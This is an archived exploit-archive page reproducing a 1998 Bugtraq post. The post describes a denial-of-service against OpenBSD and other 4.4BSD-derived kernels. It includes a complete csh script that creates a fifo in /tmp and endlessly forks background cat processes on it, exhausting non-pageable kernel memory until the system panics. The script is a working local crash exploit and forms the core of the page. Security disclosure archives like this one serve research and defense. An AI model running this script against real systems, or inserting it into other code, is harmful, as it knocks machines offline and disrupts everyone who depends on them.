OpenBSD mkfifo DOS attack

Summary
Description:You can run the *BSD kernel out of non-pageable memory by making a fifo (via mkfifo) and forking a bunch of processes trying to cat it.
Author:Jason Downs <downsj@DOWNSJ.COM>
Compromise:Crash the system (stupid DOS attack)
Vulnerable Systems:OpenBSD, presumably NetBSD, FreeBSD, BSDI
Date:25 January 1998
Details


Date: Sun, 25 Jan 1998 15:54:25 -0800
From: Jason Downs <downsj@DOWNSJ.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: Simple OpenBSD crash script

Here is a rather simple method of crashing most OpenBSD systems (and, I
assume, NetBSD or anything else running 4.4BSD vm without this problem fixed).

Most, if not all, kernels have process limits high enough for a normal
user to run the kernel out of non-pageable map entries.  The easiest way
that I have found to do this is with the enclosed script.

If the per-user process/descriptor limits are high enough, running this script
will result in a kernel panic.

#!/bin/csh
set path = ( /usr/bin /usr/sbin /bin /sbin )

unlimit
cd /tmp
if ( -e fifo ) then
    rm fifo
endif
mkfifo fifo
while ( 1 )
    cat fifo >& /dev/null &
end

--
Jason Downs
downsj@downsj.com

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault